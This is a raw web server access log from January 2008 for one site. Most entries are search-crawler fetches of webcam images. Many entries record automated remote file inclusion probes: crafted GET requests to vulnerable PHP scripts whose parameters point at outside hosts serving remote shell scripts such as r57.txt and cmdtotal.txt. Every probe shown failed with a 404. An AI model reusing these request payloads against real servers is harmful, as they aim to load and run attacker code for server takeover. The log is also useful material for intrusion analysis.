211.233.63.186 - - [15/Jan/2008:08:32:25 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:08:32:25 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:08:32:25 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:08:32:25 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:08:32:29 -0800] "GET /retreat1/webcam/retreat1_00403.jpg HTTP/1.0" 200 22702 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:08:32:37 -0800] "GET /logs/access_080101.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Jan/2008:08:32:38 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:08:32:49 -0800] "GET /retreat1/webcam/retreat1_00633.jpg HTTP/1.0" 200 28473 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:08:33:13 -0800] "GET /retreat1/webcam/retreat1_00767.jpg HTTP/1.0" 200 15118 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:08:33:41 -0800] "GET /retreat1/webcam/retreat1_00678.jpg HTTP/1.0" 200 49374 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:08:33:52 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [15/Jan/2008:08:34:02 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [15/Jan/2008:08:34:03 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [15/Jan/2008:08:34:03 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [15/Jan/2008:08:34:03 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.83.106 - - [15/Jan/2008:08:34:53 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.83.106 - - [15/Jan/2008:08:34:53 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.83.106 - - [15/Jan/2008:08:34:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:08:38:05 -0800] "GET /start.php?s=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:08:39:34 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:08:39:34 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:08:41:22 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:08:41:23 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:08:41:23 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:08:41:57 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.130.54 - - [15/Jan/2008:08:42:23 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.130.54 - - [15/Jan/2008:08:42:23 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.130.54 - - [15/Jan/2008:08:42:23 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [15/Jan/2008:08:42:23 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.34.130.54 - - [15/Jan/2008:08:42:46 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:08:42:52 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:08:42:52 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.180.18 - - [15/Jan/2008:08:42:52 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:08:43:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [15/Jan/2008:08:45:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.43.162 - - [15/Jan/2008:08:48:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:08:49:55 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.229.88 - - [15/Jan/2008:08:51:49 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [15/Jan/2008:08:51:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:08:51:57 -0800] "GET /logs/access_071229.log/start.php?s=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:08:51:58 -0800] "GET /logs/start.php?s=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.171.133 - - [15/Jan/2008:08:52:12 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://83.19.144.26/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.171.133 - - [15/Jan/2008:08:52:12 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://83.19.144.26/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.83.106 - - [15/Jan/2008:08:55:38 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.83.106 - - [15/Jan/2008:08:55:38 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.83.106 - - [15/Jan/2008:08:55:38 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.236.82 - - [15/Jan/2008:08:56:30 -0800] "GET /logs/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.236.82 - - [15/Jan/2008:08:56:30 -0800] "GET /securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:08:56:33 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:08:56:36 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:08:56:38 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.181.240.100 - - [15/Jan/2008:08:56:41 -0800] "GET /logs/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [15/Jan/2008:08:56:41 -0800] "GET /securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [15/Jan/2008:08:57:31 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [15/Jan/2008:08:57:31 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.162 - - [15/Jan/2008:08:57:31 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.103.8.13 - - [15/Jan/2008:08:58:07 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/aliif_1604/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:08:58:24 -0800] "GET /retreat1/webcam/retreat1_00840.jpg HTTP/1.0" 200 16240 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:08:59:19 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:09:00:45 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.3.92 - - [15/Jan/2008:09:00:45 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:00:57 -0800] "GET /retreat1/webcam/retreat1_00398.jpg HTTP/1.0" 200 36267 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:01:07 -0800] "GET /retreat1/webcam/retreat1_00833.jpg HTTP/1.0" 200 29791 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.52.26.218 - - [15/Jan/2008:09:01:10 -0800] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.26.218 - - [15/Jan/2008:09:01:10 -0800] "GET //components/com_minibb.php?absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.26.218 - - [15/Jan/2008:09:01:11 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:01:27 -0800] "GET /retreat1/webcam/retreat1_00898.jpg HTTP/1.0" 200 15607 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:01:49 -0800] "GET /retreat1/webcam/retreat1_00586.jpg HTTP/1.0" 200 15802 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:02:12 -0800] "GET /retreat1/webcam/retreat1_00121.jpg HTTP/1.0" 200 18174 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:02:31 -0800] "GET /retreat1/webcam/retreat1_00717.jpg HTTP/1.0" 200 15536 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.25.171 - - [15/Jan/2008:09:02:53 -0800] "GET /logs/access_080112.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:02:53 -0800] "GET /retreat1/webcam/retreat1_00227.jpg HTTP/1.0" 200 57086 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:03:14 -0800] "GET /retreat1/webcam/retreat1_00777.jpg HTTP/1.0" 200 25665 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:03:37 -0800] "GET /retreat1/webcam/retreat1_00318.jpg HTTP/1.0" 200 17697 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:03:57 -0800] "GET /retreat1/webcam/retreat1_00061.jpg HTTP/1.0" 200 21636 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.22.204 - - [15/Jan/2008:09:04:07 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:04:16 -0800] "GET /retreat1/webcam/retreat1_00371.jpg HTTP/1.0" 200 41239 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:04:37 -0800] "GET /retreat1/webcam/retreat1_00696.jpg HTTP/1.0" 200 15809 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:04:57 -0800] "GET /retreat1/webcam/retreat1_00619.jpg HTTP/1.0" 200 15362 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
212.205.236.160 - - [15/Jan/2008:09:05:11 -0800] "GET /logs/classes/core/language.php?rootdir=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.205.236.160 - - [15/Jan/2008:09:05:11 -0800] "GET /classes/core/language.php?rootdir=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:05:22 -0800] "GET /retreat1/webcam/retreat1_00882.jpg HTTP/1.0" 200 15719 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:09:05:29 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:09:05:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:05:40 -0800] "GET /retreat1/webcam/retreat1_00659.jpg HTTP/1.0" 200 49207 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:06:01 -0800] "GET /retreat1/webcam/retreat1_00537.jpg HTTP/1.0" 200 46106 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:06:25 -0800] "GET /retreat1/webcam/retreat1_00996.jpg HTTP/1.0" 200 15523 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:06:41 -0800] "GET /retreat1/webcam/retreat1_00284.jpg HTTP/1.0" 200 17553 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:07:02 -0800] "GET /retreat1/webcam/retreat1_00868.jpg HTTP/1.0" 200 15302 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:09:07:13 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:07:22 -0800] "GET /retreat1/webcam/retreat1_00350.jpg HTTP/1.0" 200 38966 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:07:45 -0800] "GET /retreat1/webcam/retreat1_00614.jpg HTTP/1.0" 200 15368 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:08:07 -0800] "GET /retreat1/webcam/retreat1_00448.jpg HTTP/1.0" 200 17712 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:08:29 -0800] "GET /retreat1/webcam/retreat1_00072.jpg HTTP/1.0" 200 21001 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:08:51 -0800] "GET /retreat1/webcam/retreat1_00316.jpg HTTP/1.0" 200 17673 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:09:24 -0800] "GET /retreat1/webcam/retreat1_00211.jpg HTTP/1.0" 200 48172 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:09:46 -0800] "GET /retreat1/webcam/retreat1_00149.jpg HTTP/1.0" 200 18094 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:10:09 -0800] "GET /retreat1/webcam/retreat1_00531.jpg HTTP/1.0" 200 35857 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:10:30 -0800] "GET /retreat1/webcam/retreat1_00532.jpg HTTP/1.0" 200 37762 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:10:52 -0800] "GET /retreat1/webcam/retreat1_00286.jpg HTTP/1.0" 200 17719 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:09:10:54 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:09:10:55 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:11:12 -0800] "GET /retreat1/webcam/retreat1_00925.jpg HTTP/1.0" 200 32741 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:11:35 -0800] "GET /retreat1/webcam/retreat1_00369.jpg HTTP/1.0" 200 40162 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:11:54 -0800] "GET /retreat1/webcam/retreat1_00665.jpg HTTP/1.0" 200 50172 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:12:20 -0800] "GET /retreat1/webcam/retreat1_00078.jpg HTTP/1.0" 200 21505 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:12:36 -0800] "GET /retreat1/webcam/retreat1_00694.jpg HTTP/1.0" 200 16727 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:09:13:07 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [15/Jan/2008:09:13:08 -0800] "GET /retreat1/webcam/retreat1_00460.jpg HTTP/1.0" 200 17983 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
190.2.45.165 - - [15/Jan/2008:09:13:30 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:14:28 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:14:28 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:14:28 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [15/Jan/2008:09:14:30 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.19.225.162 - - [15/Jan/2008:09:15:29 -0800] "GET /index1.php?table=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
